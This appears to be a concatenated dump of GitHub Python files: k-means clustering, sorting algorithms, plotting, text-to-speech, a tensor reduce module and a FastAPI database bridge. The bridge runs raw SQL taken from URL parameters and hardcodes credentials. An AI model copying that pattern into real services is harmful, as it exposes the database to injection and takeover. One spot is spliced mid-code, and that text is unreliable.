all database face features\n self.get_feature_repo()\n uid = 0\n tmp = 0\n most_face = ''\n face_img = ''\n for i in self.repo:\n distance = np.linalg.norm(na - i[2])\n conf = expit((6000 - distance) / 1000)\n if conf > tmp and conf >= score:\n uid = i[0]\n tmp = conf\n most_face = i[1]\n face_img = i[3]\n\n ret = {\n \"id\": uid,\n \"name\": most_face,\n \"face_img\": face_img,\n \"attended_at\": time.time(),\n \"score\": tmp,\n \"status\": 1\n }\n\n print(json.dumps(ret, ensure_ascii=False))\n\n def __del__(self):\n self.cur.close()\n self.conn.close()","repo_name":"jennyb2911/chameleon-2","sub_path":"sql/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"16002411456","text":"import utils\nimport numpy as np\nimport json\nimport time\n\ndef kmeans(img,k):\n \"\"\"\n Implement kmeans clustering on the given image.\n Steps:\n (1) Random initialize the centers.\n (2) Calculate distances and update centers, stop when centers do not change.\n (3) Iterate all initializations and return the best result.\n Arg: Input image;\n Number of K. \n Return: Clustering center values;\n Clustering labels of all pixels;\n Minimum summation of distance between each pixel and its center. \n \"\"\"\n\n lab=np.zeros((len(img),len(img[0])))\n r,c=img.shape\n p_val=list(set(img.flatten()))\n pts=list(cmbs(2,p_val))\n his,bedg=np.histogram(img,256,[0, 256])\n c2_fin=[] \n c1_fin=[]\n centers=[] \n s_d=float('inf')\n for pt in pts:\n d1=float('-inf')\n d2=float('-inf')\n avg_c1=0 \n avg_c2=0 \n centers1=[]\n s_d1=0\n i=0\n while(d2!= 0 and d1!= 0):\n if(i!=0):\n C1=avg_c1\n C2=avg_c2\n else:\n C1=pt[0] \n C2=pt[1]\n sum2=0\n sum1=0\n C2_lst=[] \n C1_lst=[] \n for indi,val in enumerate(his):\n if(abs(indi-C2)>abs(indi-C1)):\n C1_lst.append(val)\n sum1+=(indi*val)\n else:\n C2_lst.append(val)\n sum2+=(indi*val)\n if(sum(C1_lst)!=0):\n avg_c1=(int(sum1)/sum(C1_lst))\n if(sum(C2_lst)!=0):\n avg_c2=(int(sum2)/sum(C2_lst)) \n d1=C1-avg_c1\n d2=C2-avg_c2\n i+=1\n centers1.append(avg_c1)\n centers1.append(avg_c2)\n for indi,val in enumerate(his):\n if(abs(indi-centers1[1])>abs(indi-centers1[0])):\n s_d1+=(val*abs(indi-centers1[0]))\n else:\n s_d1+=(val*abs(indi-centers1[1]))\n if(s_d>s_d1):\n s_d=s_d1\n centers=centers1\n for indi,val in enumerate(his):\n if(abs(indi-centers[1])>abs(indi-centers[0])):\n c1_fin.append(indi)\n else:\n c2_fin.append(indi)\n for m in range(r):\n for n in range(c):\n if (img[m][n] in c1_fin):\n lab[m][n]=0\n else:\n lab[m][n]=1\n return centers,lab,s_d\n\ndef visualize(centers,labels):\n \"\"\"\n Convert the image to segmentation map replacing each pixel value with its center.\n Arg: Clustering center values;\n Clustering labels of all pixels. \n Return: Segmentation map.\n \"\"\"\n # TODO: implement this function.\n r,c=labels.shape\n res=np.zeros((r,c))\n for m in range(r):\n for n in range(c):\n if(labels[m][n]==0):\n res[m][n]=centers[0]\n else:\n res[m][n]=centers[1]\n res=res.astype(np.uint8)\n return res\n\n#To be able to generate combinations\ndef cmbs(b,ite):\n pl=tuple(ite)\n n=len(pl)\n if(n0)+b1\n ex = ez = 0.0\n ey = 0.0\n elif type==3:\n print('Comment out this line when you use your customized profile')\n # your customization here\n\n mf = np.array([bx, by, bz])\n ef = np.array([ex, ey, ez])\n return(mf, ef)\n","repo_name":"tsubok1969/toyplasma","sub_path":"sim/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15898219514","text":"#!/user/bin/python3\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\nfrom decimal import Decimal\n# Multipage pdf support\nfrom matplotlib.backends.backend_pdf import PdfPages\n# Progress bar\nfrom tqdm import tqdm\n\nfrom core.data import Data\nfrom core.helpers import create_incremented_filename\n\ndef main():\n d = Data()\n d.collect_from_csv('output/geordende_oogsten_jaar.csv')\n\n filename = create_incremented_filename('output/graphs_multiple.pdf')\n with PdfPages(filename) as pdf:\n for line in tqdm(d.data):\n name = ' '.join(line[:2])\n # Load date year pairs [decimal_date, year]\n date_year_pairs = [l.strip().split('#') for l in line[2:] if (l.strip() not in ('', '\\n', '0', 0))]\n\n # Ignore empty rows\n if not date_year_pairs:\n continue\n\n # Separate pairs into two lists\n x = [float(v[1]) for v in date_year_pairs] # Years\n y = [float(v[0]) for v in date_year_pairs] # Decimal dates\n\n\n plt.figure()\n # Scatter plot\n plt.scatter(x, y, c='#0000ff')\n # Regression line\n fit = np.polyfit(x, y, deg=1)\n fit_fn = np.poly1d(fit)\n plt.plot(x, fit_fn(x), '--k', color='red')\n #plt.axis([0, 13, int(min(dates), int(max(dates)))])\n y_mean = int(np.mean(y).round())\n plt.yticks(range(y_mean-3, y_mean+3))\n #plt.xticks(range(len(dates)))\n plt.xticks(range(2005, 2018))\n plt.ylabel('Months')\n plt.xlabel('Harvests')\n plt.title(name)\n pdf.savefig()\n\n# with PdfPages('output/graphs_combined.pdf') as pdf:\n# plt.figure()\n#\n# i = range(1, len(d.data)+1)\n# for line in tqdm(d.data):\n# name = ' '.join(line[:2])\n# # Load date year pairs [decimal_date, year]\n# date_year_pairs = [l.strip().split('#') for l in line[2:] if (l not in ('', '\\n', '0'))]\n# # Separate pairs into two lists\n#\n# x = [float(v[1]) for v in date_year_pairs] # Years\n# y = [float(v[0]) for v in date_year_pairs] # Decimal dates\n#\n#\n# # Scatter plot\n# plt.scatter(x, y, c=i, cmap=plt.cm.hsv)\n#\n# plt.yticks(range(13))\n# plt.xticks(range(2005, 2018))\n# plt.ylabel('Maanden')\n# plt.xlabel('Jaren')\n# plt.title('Weleda NL Oogsten')\n# pdf.savefig()\n\nif __name__ == '__main__':\n main()\n","repo_name":"dominic-dev/wdao","sub_path":"wdao/generate_graphs.py","file_name":"generate_graphs.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74657382983","text":"from fastapi import FastAPI\nimport pymysql\n\n# initialize\napp = FastAPI()\nconnect = pymysql.connect(\n host='192.168.56.101',\n port=4567,\n user='dohyunkim',\n password='0000',\n db='TermProject',\n charset='utf8'\n)\ncursor = connect.cursor()\n\n@app.get(\"/select\")\nasync def select(command: str):\n cursor.execute(command)\n returnValue = \"\"\n results = cursor.fetchall()\n for result in results:\n returnValue += str(result) + \"\\n\"\n return returnValue\n\n@app.get(\"/insert\")\nasync def insert(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 입력되었습니다.\"\n\n@app.get(\"/delete\")\nasync def delete(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 삭제되었습니다.\"\n\n@app.get(\"/alter\")\nasync def alter(command: str):\n cursor.execute(command)\n return \"입력하신 데이터가 적용되었습니다.\"\n\n@app.get(\"/update\")\nasync def update(command: str):\n cursor.execute(command)\n return \"입력하신 데이터값으로 값이 업데이트 되었습니다.\"\n\n@app.get(\"/end\")\nasync def end(command: str):\n disappear()\n return \"종료되었습니다.\"\n\ndef disappear():\n connect.commit()\n cursor.close()\n connect.close()\n","repo_name":"a-mystic/DB-School-lecture","sub_path":"Term Project/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18489335117","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport shutil\nimport os\nimport pandas as pd\n\n# Hold global variables for error function\nreset = 0\nerror_func_holder = []\nerror_index = []\ndef error_func(error):\n \"\"\"\n Sums up alle the distances for each centroids and stores it in global variable to plot\n at the end of algorithm.\n \"\"\"\n global error_func_holder\n summed = 0\n for key in error:\n summed += np.sum(error[key])\n error_func_holder.append(summed)\n\n\n\n\n\n\n\ndef get_distance(data, centroids, N):\n \"\"\"\n Find distance between the datapoints to the centroids.\n \"\"\"\n\n # find shape\n rows_data, cols_data = data.shape\n temp = np.zeros((rows_data,N))\n # fill temporary matrix with the distances in the N dimensional space of the dataset\n for length, row in enumerate(data):\n for cent, row_cent in enumerate(centroids):\n # [centroid1, centroid2]\n #[length , length]\n temp[length, cent] = np.linalg.norm(row-row_cent)\n\n return temp\n\n\n\ndef get_cents(data, temp, label = [None]):\n \"\"\"\n Assigns the datapoints which are nearest a centroid and put them in a dictionary\n which belongs a the centroid.\n \"\"\"\n groups = {}\n error_dist = {}\n label_dic = {}\n for i, row in enumerate(temp):\n #assign centroid to datapoints with lowest distance to a dictionary\n # argmin will give index of the lowest value (index = centroid)\n centroid_index = np.argmin(row)\n\n\n #if not exist in centroid dictionary assign new list\n if centroid_index not in groups:\n groups[centroid_index] = []\n\n if centroid_index not in error_dist:\n error_dist[centroid_index] = []\n\n #fills up the centroid with the datapoints\n groups[centroid_index].append(data[i,:])\n\n # If enabled (label != None) then add all the labels to the centroids aswell.\n if label[0] != None:\n if centroid_index not in label_dic:\n label_dic[centroid_index] = []\n label_dic[centroid_index].append(label[i])\n\n\n #fills up the error dictionary for the cost function\n error_dist[centroid_index].append(row[centroid_index])\n\n for key in groups:\n #Make them numpy arrays to be able to use numpy on the datapoints\n groups[key] = np.array(groups[key])\n error_func(error_dist)\n\n return groups, label_dic\n\n\n\ndef get_means(data, groups):\n \"\"\"\n Get the mean of the clusters and assign the centroids this new coordinate in a\n dictionary.\n \"\"\"\n features = len(data[0])\n groups_mean = {}\n for i in groups:\n for n in range(features):\n if i not in groups_mean:\n groups_mean[i] = []\n groups_mean[i].append(np.mean(groups[i][:,n]))\n\n return groups_mean\n\n\ndef initate_cents(data, N):\n \"\"\"\n Make random centroids in the vectorspace of the datapoints\n \"\"\"\n global reset\n features = len(data[0])\n # map the min and max value of the dataset to contain the centoid spawn into\n centroids = np.zeros((N,features))\n\n # place centroids in N dimensional space\n for j in range(N):\n for i in range(features):\n # make random coordinate\n rand = np.random.choice(data[random.randint(0,len(data)-1)], replace=False)\n centroids[j,i] = rand\n reset = 0\n return centroids\n\n\ndef remake_cents(data, groups_mean, N):\n \"\"\"\n Since the distance function uses matrix, we need to fill up a new\n matrix with the new mean coordinates.\n \"\"\"\n\n global error_func_holder\n global error_index\n features = len(data[0])\n centroids = np.zeros((N,features))\n\n try:\n # assign centroids to new matrix for finding distance if not all centroids (N) have atleast one\n # data point assigned to it, this test will fail and go to except to make new random centroids.\n for j in range(N):\n centroids[j,:] = groups_mean[j]\n\n # If some centroids fails tp find a cluster we make new random centroids\n # this could happen there is one centroid which didnt have a closest datapoint\n except:\n if not os.path.exists('plots'):\n os.makedirs('plots')\n # remove plots added to folder\n shutil.rmtree('plots')\n if not os.path.exists('plots'):\n os.makedirs('plots')\n\n error_index.append(len(error_func_holder)-1)\n # initiate new random centroids\n return initate_cents(data, N)\n\n return centroids\n\n\n\ndef make_plots(savefi, groups, groups_mean, N, savefigure = False):\n \"\"\"\n If savefigure = True then plot the dataset and centroids with their respective color\n and save the figures.\n \"\"\"\n plt.figure(figsize = (15,10))\n colors = ['red','blue','green','orange','pink','purple','yellow','black','brown','lightgreen','k', 'w','c','lightblue']\n for i in groups:\n plt.plot(groups[i][:,0],groups[i][:,1], 'o', color = colors[i], markeredgecolor= 'black')\n\n\n for i in groups_mean:\n plt.plot(groups_mean[i][0],groups_mean[i][1],'^', color = colors[i], markersize = 20, markeredgecolor= 'black')\n\n #make new folder if it does not exist (for plots)\n if not os.path.exists('plots'):\n os.makedirs('plots')\n # # Save plots\n # make_plots(savefi, groups, groups_mean, N)\n plt.title('K-means plot', fontsize = 20)\n if savefigure == True:\n plt.savefig('plots/k-means_%d_cents%d'%(savefi,N))\n plt.close()\n\n\n\ndef k_means(data, N, label = [None], savefigure = False, max_iters = 150):\n \"\"\"\n This is the main k-means algo, this is the function to run,\n this function \"initate_cents\", \"get_distance\", \"get_cents\", \"remake_cents\" functions.\n \n returns grousp dictionary, centroid placement dictionary, and labels (labels are empty dictionary if \n labels are not given)\n \"\"\"\n\n #make new folder if it does not exist (for plots)\n if not os.path.exists('plots'):\n os.makedirs('plots')\n\n\n # make a loader for to see that the program is working\n loader = ['|','/','-','|','/','-']\n\n # copy to avoid pointer\n data = np.copy(data)\n\n rows_data, cols_data = data.shape\n\n # Make random placed centroids\n centroids = initate_cents(data, N)\n\n #some variables to change in the whole loop to keep track of loader etc.\n change = 0\n savefi = 0\n load = 0\n global reset\n\n # Begin iteration\n while True:\n\n # Find distance from all points\n temp = get_distance(data, centroids, N)\n\n # Group the data to the centroids\n groups, label_dic = get_cents(data, temp, label)\n\n if reset >= 2:\n make_plots(savefi, groups, groups_mean, N, savefigure)\n\n # Get mean coordinates for the centroids\n groups_mean = get_means(data, groups)\n\n # make matrix with coordinates for distance measure\n centroids = remake_cents(data, groups_mean, N)\n\n\n\n # if converged or reached max iterations return the groups of clusters\n if change == np.sum(temp) or savefi == max_iters:\n global error_index\n global error_func_holder\n # get the values from error function where new centroids where generated\n error_values = [error_func_holder[x] for x in error_index]\n\n #Plots the error function and the generated centroids\n plt.plot(error_func_holder,'--', label = 'Cost function')\n #plt.plot(error_index, error_values,'*', label = 'Generated new centroids', color = 'red', markersize = 13)\n plt.title('Cost function of k-means', fontsize = 20)\n plt.ylabel('Error', fontsize = 15)\n plt.xlabel('Iteration', fontsize = 15)\n plt.legend(loc = 'best')\n # save errorfunction plot\n plt.savefig('plots/errorfunction.png')\n plt.close()\n # return the centroids with their given dataset and the placement of the centroids\n return groups, groups_mean, label_dic\n\n\n # To change name of savefig file\n savefi += 1\n reset += 1\n change = np.sum(temp)\n\n # The loader\n load += 1\n try:\n print('{0} {0} {0} Generating k-means {0} {0} {0}'.format(loader[load]), end = '\\r')\n except:\n load = 0\n print('{0} {0} {0} Generating k-means {0} {0} {0}'.format(loader[load]), end = '\\r')\n\n\n\n\n\n\ndef plot_centroids(groups, title , v, h):\n \"\"\"\n Plots the images given.\n \"\"\"\n for i in sorted(groups):\n\n plt.subplot(5,2,i+1)\n number = groups[i]\n number = np.reshape(number,(v,h))\n plt.imshow(number, cmap = 'Greys_r')\n plt.suptitle(title, fontsize = 20)\n plt.savefig('plots/%s.png'%title)\n plt.close()\n\n\n\n\n\ndef feature_reduction(X):\n \"\"\"\n Reduced the features of data to two dimensions\n \"\"\"\n # Get eigenvalues and eigenvector\n val, E = np.linalg.eig(X)\n # Sorting highest to lowest eigenvalues\n idx = val.argsort()[::-1]\n val = val[idx]\n # Taking square root of the diagonal eigenvalue matrix\n Dsqr = np.sqrt(np.diag(val))\n print(Dsqr)\n # Taking the inner product to form data-set Z\n Z = np.dot(E, Dsqr)\n # Return two features\n return Z[:,:2]\n\n\n\n\n\ndef minmax_control(groups, centroid_placement):\n \"\"\"\n Finds the datapoints closest to the centroids and the ones on the border\n returns two dictionaries, first is datapoint closest to centroids and second dictionary\n is the ones on the border. The plots are saved to folder /plots\n \"\"\"\n\n colors = ['red','blue','green','orange','pink','purple','yellow','black','brown','lightgreen','k', 'w','c','lightblue']\n \n distances_to_centroids = {}\n for i in groups:\n for datapoint in groups[i]:\n if i not in distances_to_centroids:\n distances_to_centroids[i] = []\n distances_to_centroids[i].append(np.linalg.norm(datapoint - centroid_placement[i]))\n\n borders = {}\n closest = {}\n for i in distances_to_centroids:\n if i not in borders:\n borders[i] = []\n max_index = np.argmax(distances_to_centroids[i])\n borders[i].append(groups[i][max_index])\n\n if i not in closest:\n closest[i] = []\n min_index = np.argmin(distances_to_centroids[i])\n closest[i].append(groups[i][min_index])\n \n\n \n for i in distances_to_centroids:\n plt.plot(distances_to_centroids[i], '*', markeredgecolor= 'black', markersize = 10 , color = colors[i], label = 'Centroid %d'%i)\n plt.xlabel('Index of datapoint')\n plt.ylabel('Distance from their respective centroid')\n plt.legend(loc = 'best')\n plt.savefig('plots/Distance_Plot')\n plt.close()\n\n return closest, borders\n\n\n\n\ndef border_control(centroid_placement):\n\n \"\"\"\n Finds the border cases from each centroid\n \"\"\"\n\n # finds all the unit vectors \n borders = {}\n for i in centroid_placement:\n if i not in borders:\n borders[i] = []\n for l in centroid_placement:\n if i == l:\n continue\n else:\n borders[i].append((np.array(centroid_placement[l]) - np.array(centroid_placement[i]))\\\n /(np.linalg.norm(np.array(centroid_placement[l]) - np.array(centroid_placement[i]))))\n # dictionary for which cluster it has the boundary to\n bound_change_cluster = {}\n # dictionary for the position for which the boundary is\n bound_change_position = {}\n for indec in sorted(centroid_placement):\n # lock to start with cluster when we have found the boundary\n lock = 0\n while True:\n if lock != 1:\n # Find the current position on the vector\n try:\n current_position = centroid_placement[indec] + i*np.array(borders[indec][indec])\n except:\n current_position = centroid_placement[indec] + i*np.array(borders[indec][0])\n # list to append all the distances to each centroid from the point on the vector\n lst = []\n for j in sorted(centroid_placement):\n lst.append(np.linalg.norm(current_position - centroid_placement[j]))\n # find which centroid the point belongs too by finding the minimum distance\n # and chech which index(cluster) it belongs to\n index_min = np.argmin(lst)\n i += 0.1\n if indec != index_min:\n if indec not in bound_change_position:\n bound_change_position[indec] = []\n bound_change_cluster[indec] = []\n bound_change_cluster[indec].append(index_min)\n bound_change_position[indec].append(current_position)\n lock = 1\n else:\n break\n \n return bound_change_cluster, bound_change_position\n\n\n\ndef border_control_all_boundaries(centroid_placement):\n\n \"\"\"\n Finds the border cases from each centroid\n \"\"\"\n\n # finds all the unit vectors \n borders = {}\n for i in sorted(centroid_placement):\n if i not in borders:\n borders[i] = []\n for l in sorted(centroid_placement):\n if i == l:\n continue\n else:\n borders[i].append((np.array(centroid_placement[l]) - np.array(centroid_placement[i]))\\\n /(np.linalg.norm(np.array(centroid_placement[l]) - np.array(centroid_placement[i]))))\n # dictionary for which cluster it has the boundary to\n bound_change_cluster = {}\n # dictionary for the position for which the boundary is\n bound_change_position = {}\n for indec in sorted(centroid_placement):\n for border_values in borders[indec]:\n # lock to start with cluster when we have found the boundary\n lock = 0\n while True:\n if lock != 1:\n # Find the current position on the vector\n current_position = np.array(centroid_placement[indec]) + i*np.array(border_values)\n # list to append all the distances to each centroid from the point on the vector\n lst = []\n for j in sorted(centroid_placement):\n lst.append(np.linalg.norm(current_position - centroid_placement[j]))\n # find which centroid the point belongs too by finding the minimum distance\n # and chech which index(cluster) it belongs to\n index_min = np.argmin(lst)\n i += 0.1\n if indec != index_min:\n if indec not in bound_change_position:\n bound_change_position[indec] = []\n bound_change_cluster[indec] = []\n # cluster represents which the centroid borders to\n bound_change_cluster[indec].append(index_min)\n # position is the border positions\n bound_change_position[indec].append(current_position)\n lock = 1\n else:\n break\n \n return bound_change_cluster, bound_change_position\n","repo_name":"MartinRovang/UniversityPhysics","sub_path":"Machine Learning/Hjemmeeksamener/part3/machinepy.py","file_name":"machinepy.py","file_ext":"py","file_size_in_byte":15345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"15666761237","text":"import sys, os\nimport datetime\nimport pyttsx\nimport time\n\n# Currently age and female properties are not available\n# They are just added as skeleton\n# When a workaround or provision for such properties will be available,\n# then at that time this function will modified to get voice property of that\n# Currently only by accent voice proprety is returned\ndef get_voice_property(engine, age=30, gender='female', accent='english-us'):\n\tvoices = engine.getProperty('voices')\n\tfor voice in voices:\n\t\tif accent in str(voice.name):\n\t\t\treturn voice\n\n\traise ValueError('Demanded accent does not matched')\n\ndef onStartUtterance(name):\n\tprint(name)\n\ndef speak_sentences(sentences, max_sentences_to_be_spoken=sys.maxsize):\n\tmax_sentences_to_be_spoken = min(max_sentences_to_be_spoken, len(sentences))\n\n\ti = 1\n\tfor s in sentences:\n\t if i > max_sentences_to_be_spoken:\n\t \tbreak\n\t print(s)\n\t speak_single_sentence(s)\n\t i += 1\n\t \n\ndef speak_single_sentence(sentence):\n\tengine = pyttsx.init()\n\tengine.setProperty('rate', 140)\n\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='hindi')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english')\n\tvoice = get_voice_property(engine, age=10, gender='female', accent='default')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english-north')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english_rp')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='english_wmids')\n\t# voice = get_voice_property(engine, age=10, gender='female', accent='default')\n\n\n\tengine.setProperty('voice', voice.id)\n\tengine.say(sentence)\n\tengine.runAndWait()\n \n\n\nif __name__ == '__main__':\n\tpass\n\t\t\t\n\t\t\t","repo_name":"ParasAvkirkar/MagooshHelper","sub_path":"speech_utilities.py","file_name":"speech_utilities.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"81"} +{"seq_id":"27376562493","text":"# -*- coding: utf-8 -*-\n\nfrom utils import DataTransformat, ListNode\n\nclass Solution(object):\n def addTwoNumbers(self, l1, l2):\n n = l1.val + l2.val\n l3 = ListNode(n % 10)\n l3.next = ListNode(n // 10)\n p1 = l1.next\n p2 = l2.next\n p3 = l3\n while True:\n if p1 and p2:\n sum = p1.val + p2.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p1 = p1.next\n p2 = p2.next\n p3 = p3.next\n elif p1 and not p2:\n sum = p1.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p1 = p1.next\n p3 = p3.next\n elif not p1 and p2:\n sum = p2.val + p3.next.val\n p3.next.val = sum % 10\n p3.next.next = ListNode(sum // 10)\n p2 = p2.next\n p3 = p3.next\n else:\n if p3.next.val == 0:\n p3.next = None\n break\n return l3\n\ndef add_2_numbers():\n list_1 = [2, 4, 3]\n link_1 = DataTransformat.list_2_link(list_1)\n\n list_2 = [5, 6, 4]\n link_2 = DataTransformat.list_2_link(list_2)\n \n res_link = Solution().addTwoNumbers(link_1, link_2)\n res_list = DataTransformat.link_2_list(res_link)\n print(res_list)\n\nadd_2_numbers()\n","repo_name":"halysl/code","sub_path":"leetcode/2-两数相加.py","file_name":"2-两数相加.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34480155786","text":"import random\n# max('yellow','red','orange','blue','green')\n\n# max([12,34,23,3])\n# a=max\n# print(max)\n\n# for roll in range(10):\n# print(random.randrange(1,7),end=\"\")\n\ndef my_func():\n\tx = 10\n\tprint(\"Value inside function:\",x)\n\nx = 20\nmy_func()\nprint(\"Value outside function:\",x)","repo_name":"everybees/python_with_cohorts","sub_path":"nine/oluwaseun_joshua/chapter_four/pratice_excercise.py","file_name":"pratice_excercise.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"35368662785","text":"# Sorting Algorithms\n\nclass SortingAlgorithms:\n\n # Bubble Sort\n def bubbleSort(self, arr: [int]):\n for i in range(len(arr) - 1, 0, -1):\n for j in range(i):\n if arr[j] > arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n # print(i, \" - \", j)\n return arr\n\n # Selection Sort\n def selectionSort(self, arr: [int]):\n for i in range(0, len(arr) - 1):\n minIndex = i\n for j in range(i + 1,\n len(arr)): # En sola yerlşetirilmiş elemanları tekrar tekrar gezmemek için i+1 olarak yaptık\n if arr[j] < arr[minIndex]:\n minIndex = j\n if i != minIndex:\n arr[i], arr[minIndex] = arr[minIndex], arr[i]\n return arr\n\n # Insertion Sort\n def insertionSort(self, arr: [int]):\n for i in range(1, len(arr)):\n temp = arr[i] # kıyaslama yapılacak olan degeri tutugumuz degisken.\n j = i - 1 # i - 1 sayesinde hep kıyaslama yapılan degerin solundakileri kontrol ediyoruz.\n while temp < arr[\n j] and j > -1: # j > -1 iki nedenle yapıldı, birincisi j, -1 olup dizinin son indeksini göstermesin diye.\n arr[j + 1] = arr[j]\n arr[j] = temp\n j -= 1\n return arr\n\n # Merge Sort\n def merge(self, arr1: [int], arr2: [int]):\n firstPointer = 0\n secondPointer = 0\n mergedList = []\n\n while firstPointer < len(arr1) and secondPointer < len(arr2): # Bölünmüs array lerin boyutlarını gecmemesi icin kontrol ederiz.\n if arr1[firstPointer] < arr2[secondPointer]:\n mergedList.append(arr1[firstPointer])\n firstPointer += 1\n else:\n mergedList.append(arr2[secondPointer])\n secondPointer += 1\n # 2 grubun Merge işlemi yapılırken en kucuk değer en basta olmak üzere yapılır\n # ve 2 diziden birinde en büyük değer yerleştirilmeyebilir.\n # çünkü 2 grubun en son indekslerindeki elemanlardan kücük olanı mergeList e yerleştirilince, her 2 dizinin pointer larından biri yukarıdaki koşulu saglamadıgı için\n # son eleman yerleştirilmeden işlem biter. Bu nedenle asagıda son elemanı yerleştirmek için yapılır.\n while firstPointer < len(arr1):\n mergedList.append(arr1[firstPointer])\n firstPointer += 1\n while secondPointer < len(arr2):\n mergedList.append(arr2[secondPointer])\n secondPointer += 1\n return mergedList\n\n def mergeSort(self, arr: [int]):\n # Exit condition\n # Bu recursive elemanlar birer tane kalana kadar calısır. Daha sonra merge icerisine sokar.\n if len(arr) == 1: # Tek eleman varsa sıralı dizi denebilir.\n return arr\n midPoint = int(len(arr) // 2)\n leftPart = arr[:midPoint] # bir dizinin orta noktasından soldaki değerleri almak icin.\n rightPart = arr[midPoint:] # bir dizinin orta noktasından sağındaki değerleri almak icin.\n return self.merge(self.mergeSort(leftPart), self.mergeSort(rightPart))\n\n # Quick Sort\n def pivot(self, arr: [int], pivotIndex, endIndex):\n swapIndex = pivotIndex\n for i in range(pivotIndex + 1, endIndex + 1): # dizinin tüm elemanlarına ulaşabilmek için endpoint +1 yapıldı.\n if arr[i] < arr[pivotIndex]:\n swapIndex += 1\n arr[swapIndex], arr[i] = arr[i], arr[swapIndex]\n arr[pivotIndex], arr[swapIndex] = arr[swapIndex], arr[pivotIndex]\n return swapIndex\n\n def quickSort(self, arr: [int], leftPointer= 0, rightPointer= None):\n if rightPointer == None:\n rightPointer = len(arr) -1\n if leftPointer < rightPointer:\n swapIndex = self.pivot(arr, leftPointer, rightPointer)\n self.quickSort(arr, leftPointer,swapIndex -1)\n self.quickSort(arr, swapIndex+1, rightPointer)\n return arr\n\n #Heapify\n def heapify(self, arr: [int], n, i):\n largest = i\n leftInd = 2 * i + 1\n rightInd = 2 * i + 2\n # n --> dizi içindeki eleman sayısı\n if leftInd < n and arr[largest] < arr[leftInd]:\n largest = leftInd\n\n if rightInd < n and arr[largest] < arr[rightInd]:\n largest = rightInd\n\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n self.heapify(arr, n, largest)\n\n # Heap Sort\n def heapSort(self, arr: [int]):\n n = len(arr)\n\n # MAX-HEAP\n for i in range(n, -1, -1):\n self.heapify(arr, n, i)\n\n # Swap\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n self.heapify(arr, i, 0)\n return arr\n\n\n\n\n\nmyArr = [10, 3, 4, 45, 65, 34, 54, 0, 1]\nsorting = SortingAlgorithms()\nprint(sorting.bubbleSort(myArr))\nprint(sorting.selectionSort(myArr))\nprint(sorting.insertionSort(myArr))\nprint(sorting.mergeSort(myArr))\nprint(sorting.quickSort(myArr))\nprint(\"heap Sort: \", sorting.heapSort(myArr))\n","repo_name":"BaranDgn/DataStructureStudies","sub_path":"SortingAlgorithm/SortingAlgorithms.py","file_name":"SortingAlgorithms.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72452869704","text":"import operator\nfrom typing import Callable, Union\nfrom pyskip.index import take\nfrom pyskip.manipulate import flatten, squeeze\nfrom pyskip.tensor import Scalar, Tensor\n\n\ndef reduce(\n op: Callable[[Scalar, Scalar], Scalar],\n t: Tensor,\n axis: int = None,\n keepdims=False,\n) -> Union[Tensor, Scalar]:\n assert len(t) > 0\n if axis is None:\n return reduce(op, flatten(t), axis=0, keepdims=keepdims)\n assert 0 <= axis < len(t.shape)\n if len(t) == 1:\n return t if keepdims else t.item()\n if t.shape[axis] == 1:\n return t if keepdims else squeeze(t)\n else:\n n = t.shape[axis]\n if n % 2 == 1:\n last = take(t, slice(-1, n), axis)\n if len(t.shape) == 1:\n last = last.item()\n\n return op(reduce(op, take(t, slice(-1), axis)), last)\n else:\n lo = take(t, slice(0, n, 2), axis)\n hi = take(t, slice(1, n, 2), axis)\n return reduce(op, op(lo, hi), axis, keepdims)\n\n\ndef add(t: Tensor, axis: int = None, keepdims=False) -> Tensor:\n if t.empty():\n return t.dtype(0)\n return reduce(operator.add, t, axis, keepdims)\n\n\ndef mul(t: Tensor, axis: int = None, keepdims=False) -> Tensor:\n if t.empty():\n return t.dtype(1)\n return reduce(operator.mul, t, axis, keepdims)\n\n\n# Convenience aliases for reduction operators\nsum = add\nprod = mul\n","repo_name":"turtlesoupy/pyskip","sub_path":"src/pyskip/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"25865132369","text":"#!/usr/bin/env python3\n# Utility for detecting and fixing whitespace issues in LAMMPS\n#\n# Written by Richard Berger (Temple University)\nfrom __future__ import print_function\nimport sys\n\nif sys.version_info.major < 3:\n sys.exit('This script must be run with Python 3.5 or later')\n\nif sys.version_info.minor < 5:\n sys.exit('This script must be run with Python 3.5 or 